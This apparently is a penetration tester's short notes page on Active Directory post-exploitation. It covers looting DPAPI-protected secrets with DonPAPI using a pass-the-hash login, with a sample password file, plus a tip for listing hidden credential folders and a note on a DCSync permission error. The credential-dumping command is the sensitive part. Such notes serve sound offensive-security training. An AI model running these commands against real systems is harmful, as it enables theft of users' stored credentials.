Post Exploitation & Looting

Tbd

Looting secrets with DonPAPI

Important

You need to provide a password file containing username and password so DonPAPI can decrypt the encrypted files using masterkeys and what not.
Folders/Files under C:\Users\<user>\AppData\Local\Microsoft\Credentials are hidden. You need to use dir /f or Get-ChildItem -force to see them.

donpapi collect -t target.lab.local -u adminuser  -H ab7b75ff84475be2e8c4dcb7390955c3:ab7b75ff84475be2e8c4dcb7390955c3  -d lab.local --pwdfile ./creds.txt

Example pwdfile:

creds.txt

jane.doe:World123!
octave:RubberTrain99
john.elton:Ilovemusic1723

Ref: https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets#practice

DCSync

Errors

The distinguished name specified for this replication operation is invalid.

You don’t have perms.

Ref: https://blog.spookysec.net/domain-controller-sync/

Privilege Escalation Defence Evasion